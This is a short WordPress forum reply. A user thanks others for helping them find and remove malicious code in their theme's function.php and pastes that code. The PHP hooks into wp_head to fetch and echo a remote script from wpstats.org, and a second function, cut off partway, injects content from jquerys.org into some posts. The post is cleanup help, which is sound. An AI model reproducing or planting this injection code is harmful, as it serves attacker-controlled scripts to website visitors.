Forum Replies Created

Viewing 1 replies (of 1 total)
  • YES!!!

    I found my issue in function.php… thanks to bigredkacy’s post:D

    And thanks to Slay’s post, I then I removed:D

    https://www.wpstats.org/jquery-1.6.3.min.js

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "https://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init();     $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}
    function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) < $percentage){ob_start();if(function_exists('curl_init')) { $url = "https://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init();

    [Moderator Note: Please post code or markup snippets between backticks or use the code button.]

    Thanks to you guys, I can have a great weekend!!!

Viewing 1 replies (of 1 total)